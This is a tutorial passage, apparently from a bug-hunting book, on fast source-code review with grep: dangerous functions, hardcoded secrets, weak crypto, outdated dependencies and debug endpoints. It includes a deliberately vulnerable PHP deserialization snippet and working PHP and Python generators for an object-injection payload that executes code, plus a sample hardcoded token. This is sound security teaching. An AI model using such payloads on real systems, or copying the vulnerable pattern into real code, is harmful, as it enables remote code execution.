The Fast Approach: grep Is Your Best Friend

Published 2024-10-11 20:34:06

There are several ways to go about hunting for vulnerabilities in source code, depending on how thorough you want to be. We’ll begin with what I call the “I’ll take what I can get” strategy. It works great if you want to maximize the number of bugs found in a short time. These techniques are speedy and often lead to the discovery of some of the most severe vulnerabilities, but they tend to leave out the more subtle bugs.

Dangerous Patterns

Using the grep command, look for specific functions, strings, keywords, and coding patterns that are known to be dangerous. For example, the use of the eval() function in PHP can indicate a possible code injection vulnerability.

To see how, imagine you search for eval() and pull up the following code snippet:

<?php
  // [...]
  class UserFunction
  {
    private $hook;
    function __construct(){
      // [...]
    }
    function __wakeup(){
      if (isset($this->hook)) eval($this->hook);  // (1)
    }
  }
  // [...]
  $user_data = unserialize($_COOKIE['data']);  // (2)
  // [...]
?>

In this example, $_COOKIE['data'] (2) retrieves a user cookie named data, and unserialize() turns it back into a PHP object. The eval() function (1) executes the PHP code in the string passed to it. Put together, this piece of code takes a user cookie named data and unserializes it. The application also defines a class named UserFunction whose __wakeup() method, which PHP calls automatically when an object is unserialized, runs eval() on the string stored in the instance’s $hook property.

This code contains an insecure deserialization vulnerability that leads to RCE. That’s because the application takes user input from a cookie and plugs it directly into unserialize(). As a result, users can make unserialize() instantiate any class the application has access to by constructing a serialized object and passing it in the data cookie.

This deserialization flaw leads to RCE because the application passes a user-provided object into unserialize(), and the UserFunction class runs eval() on that object’s $hook property, so users can make the application execute arbitrary PHP code. To exploit it, you simply have to set your data cookie to a serialized UserFunction object with the hook property set to whatever PHP code you want. You can generate the serialized object by using the following bit of code:

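<?php
  // Mirror the target's class so the serialized output uses the same class and property names.
  class UserFunction
  {
    private $hook = "phpinfo();";
  }
  // URL-encode the serialized object so it can be placed in the data cookie.
  print urlencode(serialize(new UserFunction));
?>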

Passing the resulting string into the data cookie will cause the code phpinfo(); to be executed. This example is taken from OWASP’s PHP object injection guide at https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection . You can learn more about insecure deserialization vulnerabilities in Chapter 14 .
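
To make the serialized format concrete, here is a minimal sketch in Python that hand-builds the same string the PHP snippet above should print. The helper names are hypothetical, and the sketch assumes PHP’s standard serialization layout, in which a private property is stored under the name "\0ClassName\0property". Treat it as an illustration of the payload’s shape, not a replacement for generating it with PHP.

```python
from urllib.parse import quote_plus


def php_serialize_string(value: str) -> str:
    """Serialize a string the way PHP does: s:<byte length>:"<value>";"""
    return 's:{}:"{}";'.format(len(value.encode("utf-8")), value)


def serialize_user_function(hook_code: str) -> str:
    """Build a serialized UserFunction object with one private $hook property."""
    class_name = "UserFunction"
    # PHP stores private properties as "\0ClassName\0property".
    prop_name = "\0{}\0hook".format(class_name)
    body = php_serialize_string(prop_name) + php_serialize_string(hook_code)
    # O:<class name length>:"<class name>":<property count>:{<properties>}
    return 'O:{}:"{}":1:{{{}}}'.format(len(class_name), class_name, body)


payload = serialize_user_function("phpinfo();")
# URL-encode the payload (including the NUL bytes) for use as a cookie value.
cookie_value = quote_plus(payload)
print(cookie_value)
```

The NUL bytes around the class name are why the payload has to be URL-encoded before it goes into the cookie.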

When you are just starting to review a piece of source code, focus on searching for dangerous functions used on user-controlled data. Table 22-1 lists a few examples of dangerous functions to look out for. The presence of these functions does not guarantee a vulnerability, but it can alert you to possible vulnerabilities.

Table 22-1 : Potentially Vulnerable Functions

| Language | Function | Possible vulnerability |
|---|---|---|
| PHP | eval(), assert(), system(), exec(), shell_exec(), passthru(), popen(), backticks (`CODE`), include(), require() | RCE if used on unsanitized user input. eval() and assert() execute PHP code in their input (assert() evaluates string arguments only in PHP versions before 8.0), while system(), exec(), shell_exec(), passthru(), popen(), and backticks execute system commands. include() and require() can be used to execute PHP code by feeding the function a URL to a remote PHP script (when allow_url_include is enabled). |
| PHP | unserialize() | Insecure deserialization if used on unsanitized user input. |
| Python | eval(), exec(), os.system() | RCE if used on unsanitized user input. |
| Python | pickle.loads(), yaml.load() | Insecure deserialization if used on unsanitized user input. |
| JavaScript | document.write(), document.writeln() | XSS if used on unsanitized user input. These functions write to the HTML document, so if attackers can control the value passed into them on a victim’s page, they can write JavaScript onto that page. |
| JavaScript | document.location.href | Open redirect when set from unsanitized user input. Assigning to document.location.href changes the location of the user’s page. |
| Ruby | system(), exec(), %x(), backticks (`CODE`) | RCE if used on unsanitized user input. |
| Ruby | Marshal.load(), YAML.load() | Insecure deserialization if used on unsanitized user input. |
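
If you would rather script this search than run grep by hand, the idea can be sketched in a few lines of Python. This is a minimal sketch, not a real static analyzer: the function list is a subset of Table 22-1, the helper name find_dangerous_calls is made up for illustration, and the pattern only catches calls written with parentheses (so it misses PHP’s `include $file;` form and backticks).

```python
import re

# Function names taken from Table 22-1; extend the list for your target's language.
DANGEROUS_FUNCTIONS = [
    "eval", "assert", "system", "exec", "shell_exec", "passthru",
    "popen", "unserialize", "include", "require",
]

# \b stops "exec" from matching inside longer names such as "shell_exec".
CALL_PATTERN = re.compile(
    r"\b(" + "|".join(map(re.escape, DANGEROUS_FUNCTIONS)) + r")\s*\("
)


def find_dangerous_calls(source):
    """Return (line number, function name, line text) for each suspicious call."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in CALL_PATTERN.finditer(line):
            hits.append((lineno, match.group(1), line.strip()))
    return hits


sample = """<?php
class UserFunction {
    function __wakeup() {
        if (isset($this->hook)) eval($this->hook);
    }
}
$user_data = unserialize($_COOKIE['data']);
"""

for hit in find_dangerous_calls(sample):
    print(hit)
```

Each hit is only a lead. You still have to trace whether the argument is user controlled before calling it a vulnerability.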

Leaked Secrets and Weak Encryption

Look for leaked secrets and credentials. Sometimes developers make the mistake of hardcoding secrets such as API keys, encryption keys, and database passwords into source code. When that source code is leaked to an attacker, the attacker can use these credentials to access the company’s assets. For example, I’ve found hardcoded API keys in the JavaScript files of web applications.

You can look for these issues by grepping for keywords such as key, secret, password, encrypt, API, login, or token. You can also regex search for hex or base64 strings, depending on the format of the credentials you’re looking for. For instance, older GitHub personal access tokens are lowercase, 40-character hex strings (newer ones carry a prefix such as ghp_). A search pattern like [a-f0-9]{40} would find them in the source code. This pattern matches any run of 40 characters that contains only digits and the hex letters a to f, so it will also flag other hex values of that length, such as SHA-1 hashes.

When searching, you might pull up a section of code like this one, written in Python:

import requests

GITHUB_ACCESS_TOKEN = "0518fb3b4f52a1494576eee7ed7c75ae8948ce70"  # (1) hardcoded credential
headers = {
    "Authorization": "token {}".format(GITHUB_ACCESS_TOKEN),
    "Accept": "application/vnd.github.v3+json",
}
api_host = "https://api.github.com"
usernames = ["vickie"]  # (2) List users to analyze

def request_page(path):
    # Return the parsed JSON body, or an empty list if the request fails.
    try:
        resp = requests.get(url=path, headers=headers, timeout=15, verify=False)
        return resp.json()
    except (requests.RequestException, ValueError):
        return []

def find_repos():  # (3)
    # Find repositories owned by the users.
    for username in usernames:
        path = "{}/users/{}/repos".format(api_host, username)
        resp = request_page(path)
        for repo in resp:
            print(repo["name"])

if __name__ == "__main__":
    find_repos()

This Python program takes a list of GitHub usernames (2) and prints out the names of all of each user’s repositories (3). This is probably an internal script used to monitor the organization’s assets. But the developer hardcoded a GitHub access token into the source code (1), so once the source code is leaked, the token becomes public information.
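
As a rough sketch of how such a search might be automated, the following Python snippet looks for 40-character hex strings and notes whether one of the keywords mentioned earlier appears on the same line. The function name and the sample text are assumptions made for illustration; the lookarounds are an addition so that longer hex runs are not reported as 40-character matches.

```python
import re

# Keywords that often sit next to a credential.
KEYWORD_PATTERN = re.compile(
    r"key|secret|password|encrypt|api|login|token", re.IGNORECASE
)
# Exactly 40 lowercase hex characters, not embedded in a longer hex run.
HEX40_PATTERN = re.compile(r"(?<![a-f0-9])[a-f0-9]{40}(?![a-f0-9])")


def find_candidate_secrets(source):
    """Return (line number, matched string, keyword on same line) tuples."""
    results = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        has_keyword = bool(KEYWORD_PATTERN.search(line))
        for match in HEX40_PATTERN.finditer(line):
            results.append((lineno, match.group(0), has_keyword))
    return results


sample = '''import requests
GITHUB_ACCESS_TOKEN = "0518fb3b4f52a1494576eee7ed7c75ae8948ce70"
checksum = "0518fb3b4f52a1494576eee7ed7c75ae8948ce70ab"
'''

for result in find_candidate_secrets(sample):
    print(result)
```

A match next to a keyword like TOKEN deserves a closer look first. A bare 40-character hex string may just be a commit hash.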

Entropy scanning can help you find secrets that don’t adhere to a specific format. In computing, entropy is a measurement of how random and unpredictable something is. For instance, a string composed of only one repeated character, like aaaaa , has very low entropy. A longer string with a larger set of characters, like wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY , has higher entropy. Entropy is therefore a good tool to find highly randomized and complex strings, which often indicate a secret. TruffleHog by Dylan Ayrey ( https://github.com/trufflesecurity/truffleHog/ ) is a tool that searches for secrets by using both regex and entropy scanning.
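
To see what entropy scanning measures, here is a minimal sketch that computes Shannon entropy in bits per character for the two example strings above. It is not how TruffleHog is implemented; it only illustrates the metric, and any cutoff you choose for flagging a string is an assumption you would need to tune.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Return the Shannon entropy of text in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    # Sum -p * log2(p) over the relative frequency p of each distinct character.
    return sum(-(n / total) * math.log2(n / total) for n in counts.values())


low = shannon_entropy("aaaaa")
high = shannon_entropy("wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY")
print(low, high)
```

The repeated-character string scores zero, while the key-like string scores well above four bits per character.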

Finally, look for the use of weak cryptography or hashing algorithms. This issue is hard to find during black-box testing but easy to spot when reviewing source code. Look for issues such as weak encryption keys, breakable encryption algorithms, and weak hashing algorithms. Grep the names of weak algorithms and cipher modes like ECB, MD4, and MD5. The application might have functions named after them, such as ecb(), create_md4(), or md5_hash(). It might also have variables that carry the name, like ecb_key, and so on. The impact of weak hashing algorithms depends on where they are used. If they are used to hash values that are not considered security sensitive, their usage will have less of an impact than if they are used to hash passwords.
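
A small sketch of that search, assuming you also want a crude hint about impact: it flags lines that mention ECB, MD4, or MD5 and records whether the same line also mentions a password. The function name, the password heuristic, and the sample lines are all hypothetical.

```python
import re

# Names from the text above; the list is illustrative and worth extending.
WEAK_CRYPTO_PATTERN = re.compile(r"ecb|md4|md5", re.IGNORECASE)
# Crude hint that the value being processed is a password.
PASSWORD_PATTERN = re.compile(r"password|passwd|pwd", re.IGNORECASE)


def find_weak_crypto(source):
    """Return (line number, algorithm name, near password) for each mention."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        near_password = bool(PASSWORD_PATTERN.search(line))
        for match in WEAK_CRYPTO_PATTERN.finditer(line):
            hits.append((lineno, match.group(0).lower(), near_password))
    return hits


sample = """digest = md5_hash(password)
cipher = AES.new(ecb_key, AES.MODE_ECB)
token = sha256(session_id)
"""

for hit in find_weak_crypto(sample):
    print(hit)
```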

New Patches and Outdated Dependencies

If you have access to the commit or change history of the source code, you can also focus your attention on the most recent code fixes and security patches. Recent changes haven’t stood the test of time and are more likely to contain bugs. Look at the protection mechanisms implemented and see if you can bypass them.

Also search for the program’s dependencies and check whether any of them are outdated. Grep for the import statements and dependency declarations of the language you are working with, using keywords like import, require, and dependencies. Then research the versions in use to see if any vulnerabilities are associated with them in the CVE database ( https://cve.mitre.org/ ). The process of scanning an application for vulnerable dependencies is called software composition analysis (SCA). The OWASP Dependency-Check tool ( https://owasp.org/www-project-dependency-check/ ) can help you automate this process. Commercial tools with more capabilities exist too.
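
The version check itself can be sketched as follows. This assumes a Python project with a requirements-style file and a lookup table of the first fixed version for each package. Both the package names and the versions below are made up for illustration; in practice that table would come from your research in the CVE database or from an SCA tool.

```python
import re

# Matches pinned lines such as "name==1.2.3".
PINNED_REQUIREMENT = re.compile(
    r"^\s*([A-Za-z0-9_.\-]+)\s*==\s*([0-9][A-Za-z0-9_.\-]*)"
)


def parse_pinned(requirements_text):
    """Map package name -> pinned version for lines like 'name==1.2.3'."""
    pinned = {}
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0]  # drop trailing comments
        match = PINNED_REQUIREMENT.match(line)
        if match:
            pinned[match.group(1).lower()] = match.group(2)
    return pinned


def version_tuple(version):
    """Turn '1.2.3' into (1, 2, 3); only purely numeric versions are handled."""
    return tuple(int(part) for part in version.split("."))


def find_outdated(pinned, first_fixed):
    """Return names whose pinned version is older than the first fixed version."""
    return sorted(
        name
        for name, version in pinned.items()
        if name in first_fixed
        and version_tuple(version) < version_tuple(first_fixed[name])
    )


# Hypothetical data, for illustration only.
requirements = """examplelib==1.4.2   # hypothetical package
otherlib==2.0.0
notpinned>=3.1
"""
first_fixed_versions = {"examplelib": "1.5.0", "otherlib": "1.9.0"}

outdated = find_outdated(parse_pinned(requirements), first_fixed_versions)
print(outdated)
```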

Developer Comments

You should also look for developer comments, hidden debug functionalities, and accidentally exposed configuration files. Developers often forget about these resources, and they can leave the application in a dangerous state.

Developer comments can point out obvious programming mistakes. For example, some developers like to put comments in their code to remind themselves of incomplete tasks. They might write comments like this one, which points out a vulnerability in the code:

# todo: Implement CSRF protection on the change_password endpoint.

You can find developer comments by searching for the comment characters of each programming language. In Python, it’s #. In Java, JavaScript, and C++, it’s // for single-line comments and /* ... */ for block comments. You can also search for terms like todo, fix, completed, config, setup, and removed in source code.
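
One way to combine both searches is sketched below: pull out the text after a # or // marker and keep it only if it contains one of the terms listed above. The function name is hypothetical, and the comment detection is deliberately naive. It will also trip on a # inside a string or the // in a URL, so expect some noise.

```python
import re

# Single-line comment markers: "#" for Python, "//" for Java, JavaScript, and C++.
COMMENT_PATTERN = re.compile(r"(#|//)(.*)$")
# Leading word boundary only, so "fixme" and "configuration" also match.
KEYWORD_PATTERN = re.compile(
    r"\b(todo|fix|completed|config|setup|removed)", re.IGNORECASE
)


def find_flagged_comments(source):
    """Return (line number, comment text) for comments containing a keyword."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        comment = COMMENT_PATTERN.search(line)
        if comment and KEYWORD_PATTERN.search(comment.group(2)):
            hits.append((lineno, comment.group(2).strip()))
    return hits


sample = """def change_password(request):
    # todo: Implement CSRF protection on the change_password endpoint.
    user = request.user  # current account
    return update(user)
"""

for hit in find_flagged_comments(sample):
    print(hit)
```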

Debug Functionalities, Configuration Files, and Endpoints

Hidden debug functionalities often lead to privilege escalation, as they’re intended to let the developers themselves bypass protection mechanisms. You can often find them at special endpoints, so search for strings like HTTP , HTTPS , FTP , and dev . For example, you might find a URL like this somewhere in the code that points you to an admin panel:

http://dev.example.com/admin?debug=1&password=password # Access debug panel

Configuration files allow you to gain more information about the target application and might contain credentials. You can look for filepaths to configuration files in source code as well. Configuration files often have the file extensions .conf , .env , .cnf , .cfg , .cf , .ini , .sys , or .plist .
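
If you have the source tree on disk, a short script can list files with these extensions. The sketch below uses Python’s pathlib. The function name and the temporary demo files are assumptions made for illustration.

```python
import tempfile
from pathlib import Path

CONFIG_EXTENSIONS = {".conf", ".env", ".cnf", ".cfg", ".cf", ".ini", ".sys", ".plist"}


def find_config_files(root):
    """Return sorted relative paths under root that look like config files."""
    root = Path(root)
    matches = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        # pathlib reports no suffix for a bare ".env" file, so check the name too.
        if path.suffix.lower() in CONFIG_EXTENSIONS or path.name.lower() in CONFIG_EXTENSIONS:
            matches.append(path.relative_to(root).as_posix())
    return sorted(matches)


# Demo on a throwaway directory with placeholder files.
with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)
    (base / "app").mkdir()
    (base / "app" / "settings.ini").write_text("[db]\npassword = placeholder\n")
    (base / "app" / "main.py").write_text("print('hi')\n")
    (base / ".env").write_text("API_KEY=placeholder\n")
    found = find_config_files(base)

print(found)
```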

Next, look for additional paths, deprecated endpoints, and endpoints in development. These are endpoints that users might not encounter when using the application normally. But if they still work and an attacker discovers them, they can lead to vulnerabilities such as authentication bypass and sensitive information leaks, depending on the exposed endpoint. You can search for strings and characters that indicate URLs, like HTTP, HTTPS, slashes (/), URL parameter markers (?), file extensions (.php, .html, .js, .json), and so on.
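
A minimal sketch of this kind of search, using two regular expressions: one for absolute URLs and one for quoted strings that start with a slash. The patterns and the sample lines are illustrative assumptions and will need tuning for a real codebase.

```python
import re

# Absolute URLs with an http, https, or ftp scheme.
URL_PATTERN = re.compile(r"\b(?:https?|ftp)://[^\s\"'<>)]+", re.IGNORECASE)
# Quoted strings that begin with "/" and may carry a query string.
PATH_PATTERN = re.compile(r"[\"'](/[A-Za-z0-9_\-./]+(?:\?[^\"'\s]*)?)[\"']")


def extract_endpoints(source):
    """Return (sorted unique URLs, sorted unique quoted paths) found in source."""
    urls = sorted(set(URL_PATTERN.findall(source)))
    paths = sorted(set(PATH_PATTERN.findall(source)))
    return urls, paths


sample = '''
DEBUG_PANEL = "http://dev.example.com/admin?debug=1&password=password"  # Access debug panel
fetch("/api/v1/users.json")
legacy = '/old/login.php?next=/home'
'''

urls, paths = extract_endpoints(sample)
print(urls)
print(paths)
```

Requesting each recovered endpoint against the live application tells you which ones still respond.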
